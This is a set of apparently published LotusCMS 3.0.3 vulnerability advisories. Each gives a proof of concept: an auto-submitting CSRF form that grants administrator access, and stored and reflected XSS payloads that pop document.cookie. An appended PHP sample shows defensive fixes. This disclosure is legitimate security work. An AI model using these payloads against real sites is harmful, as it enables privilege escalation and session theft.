Product: LotusCMS
Vendor: Arboroia Network (http://www.lotuscms.org/)
Vulnerable Version: 3.0.3 and probably prior versions
Vendor Notification: 01 March 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to the failure of the "core/model/UsersModel.php" script to properly verify the source of the HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/index.php?system=Users&page=edit&active=USERNAME" method="post" name="main">
<input type="hidden" name="name" value="test">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="password1" value="">
<input type="hidden" name="password2" value="">
<input type="hidden" name="access" value="administrator">
</form>
<script>
document.main.submit();
</script>
Vulnerability ID: HTB22887
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_lotuscms_3.html

Product: LotusCMS
Vendor: Arboroia Network (http://www.lotuscms.org/)
Vulnerable Version: 3.0.3 and probably prior versions
Vendor Notification: 01 March 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to the failure of the "modules/Menu/MenuModuleAdmin.php" script to properly sanitize user-supplied input in the "title" variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/index.php?system=Modules&page=admin&active=Menu&req=save&id=3" method="post" name="main">
<input type="hidden" name="title" value='lotus"><script>alert(document.cookie)</script>'>
<input type="hidden" name="external" value="http://host">
</form>
<script>
document.main.submit();
</script>
Vulnerability ID: HTB22885
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_lotuscms_2.html

Product: LotusCMS
Vendor: Arboroia Network (http://www.lotuscms.org/)
Vulnerable Version: 3.0.3 and probably prior versions
Vendor Notification: 01 March 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to the failure of the "core/model/PageModel.php" script to properly sanitize user-supplied input in the "page" variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
http://host/index.php?page=%00"><script>alert(document.cookie)</script>
Vulnerability ID: HTB22884
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_lotuscms_1.html

Product: LotusCMS
Vendor: Arboroia Network (http://www.lotuscms.org/)
Vulnerable Version: 3.0.3 and probably prior versions
Vendor Notification: 01 March 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to the failure of the "core/model/SEOModel.php" script to properly sanitize user-supplied input in the "seodescription" variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/index.php?system=SEO&page=edit" method="post" name="main">
<input type="hidden" name="seokeywords" value="LotusCMS">
<input type="hidden" name="seodescription" value='description"><script>alert(document.cookie)</script>'>
</form>
<script>
document.main.submit();
</script>
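
The two server-side controls whose absence the CSRF and XSS advisories above describe, as an added example that is not LotusCMS code and not part of the original advisories: a per-session token checked on every state-changing POST, and output encoding plus an allow-list for the "page" value. The function names, the csrf_token field name and the sample requests are assumptions made for illustration.

```php
<?php
// Added example, not LotusCMS code; all function names are hypothetical.
declare(strict_types=1);

// CSRF: one random token per session, embedded as a hidden field in every form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// CSRF: accept a POST only if it carries the session's token (constant-time compare).
function csrf_check(array $post): bool {
    $sent = $post['csrf_token'] ?? '';
    $want = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && is_string($want) && $want !== ''
        && hash_equals($want, $sent);
}

// XSS: encode at output so " ' < > cannot close the attribute or open a tag.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "page" parameter: allow-list page-name characters; NUL bytes and markup fail.
function clean_page_name(string $page): ?string {
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page) === 1 ? $page : null;
}

// Constructed requests modelled on the parameters named in the advisories.
session_start();
$token  = csrf_token();
$forged = ['name' => 'test', 'access' => 'administrator'];  // cross-site form: no token
$honest = $forged + ['csrf_token' => $token];               // form rendered by the app

var_dump(csrf_check($forged), csrf_check($honest));

$title = 'lotus"><script>alert(document.cookie)</script>';
echo '<input type="hidden" name="title" value="' . h($title) . '">' . "\n";

var_dump(clean_page_name("\0\"><script>"), clean_page_name('about-us'));
```

Encoding is applied when a stored field such as title or seodescription is written into a page, so values saved before the fix are also rendered inert.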